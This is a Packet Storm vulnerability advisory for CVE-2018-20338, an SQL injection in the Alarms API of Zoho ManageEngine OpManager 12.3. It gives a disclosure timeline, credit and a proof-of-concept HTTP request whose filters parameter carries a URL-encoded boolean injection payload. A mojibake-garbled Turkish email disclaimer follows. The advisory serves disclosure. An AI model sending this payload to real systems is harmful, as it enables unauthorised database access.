Zoho ManageEngine OpManager 12.3 Alarms SQL Injection

2018-12-21T00:00:00
ID PACKETSTORM:150898
Type packetstorm
Reporter Murat Aydemir
Modified 2018-12-21T00:00:00

Description

                                        
                                            `I. VULNERABILITY  
-------------------------  
Zoho ManageEngine OpManager 12.3 before build 123239 allows SQL  
injection in the Alarms section  
  
II. CVE REFERENCE  
-------------------------  
CVE-2018-20338  
  
III. VENDOR  
-------------------------  
https://www.manageengine.com  
  
IV. TIMELINE  
-------------------------  
20/11/18 Vulnerability discovered  
20/11/18 Vendor contacted  
20/12/2018 OPManager replay that they fixed  
  
V. CREDIT  
-------------------------  
Murat Aydemir from Biznet Bilisim A.S.  
  
VI. DESCRIPTION  
-------------------------  
ManageEngine OPManager product(version 12.3) was vulnerable to SQL  
Injection attacks. A successfully exploit of this attack could allow  
arbitrary code execution or unauthenticated access in databases  
information.  
References: https://www.manageengine.com/network-monitoring/help/read-me.html  
https://bugbounty.zoho.com/bb/info#hof  
  
VII. PoC  
-------------------------  
GET /api/json/alarm/listAlarms?isFluidic=true&isWebclient=true&apiKey=5f5e26abc7bf2af2a5669cf258ec8385&alertType=ActiveAlarms&sortByCategory=true&isNotes=true&_search=true&nd=1539945434261&rows=100&page=1&sortByColumn=modTime&sortByType=desc&filters=%7b%22groupOp%22%3a%22AND%22%2c%22rules%22%3a[%7b%22field%22%3a%22message%22%2c%22op%22%3a%22cn%22%2c%22data%22%3a%22test78275719'%20or%201268%3d1268--%20%22%7d]%7d&_=1539935356081  
HTTP/1.1  
Host: vulnerablehost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)  
Gecko/20100101 Firefox/61.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://vulnerablehost/apiclient/ember/index.jsp  
X-Requested-With: XMLHttpRequest  
Cookie: JSESSIONID=XXXXXXXXX; encryptPassForAutomaticSignin=XXXXXXXXX;  
userNameForAutomaticSignin=admin;  
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;  
authrule_name=Authenticator; NFA__SSO=XXXXXXXXX;  
opmcsrfcookie=XXXXXXXXX  
DNT: 1  
Connection: close  
  
--   
  
  
  
  
  
  
  
  
  
Bu mesaj ve ekleri, mesajda   
gAPnderildiAi belirtilen   
kiAi/kiAilere APzeldir ve gizlidir. Bu mesaj   
herhangi bir amaASS iASSin   
ASSoAaltA+-lamaz, daAA+-tA+-lamaz ve yayA+-nlanamaz.   
MesajA+-n gAPnderildiAi kiAi   
deAilseniz, mesaj iASSeriAini ya da eklerini   
kopyalamayA+-nA+-z, yayA+-nlamayA+-nA+-z   
ya da baAka kiAilere yAPnlendirmeyiniz ve   
mesajA+- gAPnderen kiAiyi derhal   
uyararak bu mesajA+- siliniz. Airketimiz,   
mesajA+-n iASSeriAinin ve eklerinin   
size deAiAikliAe uArayarak veya geASS   
ulaAmasA+-ndan; gizliliAinin   
korunmamasA+-ndan; virA1/4s iASSermesinden ve   
bilgisayar sisteminize verebileceAi   
herhangi bir zarardan sorumlu   
deAildir  
  
  
This message and its   
attachments   
are confidential and intended solely for the recipient(s)   
stated therein.   
This message cannot be copied, distributed or published   
for any purpose.   
If you are not the intended recipient, please do not   
copy, publish or   
forward the information existing in the content and   
attachments of this   
message. In such case please notify the sender   
immediately and delete all   
the copies of the message. Our company shall   
have no liability for any   
changes in or late receiving of the message,   
loss of integrity and   
confidentiality, viruses and any damages caused in  
anyway to your computer   
system based on this message.  
`